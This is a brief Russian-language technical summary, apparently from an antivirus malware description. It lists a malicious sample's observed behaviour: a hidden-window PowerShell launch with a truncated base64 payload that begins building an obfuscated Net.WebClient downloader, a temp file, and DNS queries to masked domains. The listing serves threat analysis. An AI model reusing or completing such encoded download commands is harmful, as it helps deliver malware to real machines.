Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB1AFUAQgBvADQAeABfAD0AKAAnAFUAQQBvAFgAJwArACcAMQAnACsAJwBHADQAQQAnACkAOwAkAFQARAA0AG8AQQBYAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\848614.cvr
- DNS ASK us##i.com
- DNS ASK 91###aphics.com
- DNS ASK ac###gger.com
- DNS ASK we###nie.com
- DNS ASK wa##ma.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB1AFUAQgBvADQAeABfAD0AKAAnAFUAQQBvAFgAJwArACcAMQAnACsAJwBHADQAQQAnACkAOwAkAFQARAA0AG8AQQBYAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...' (со скрытым окном)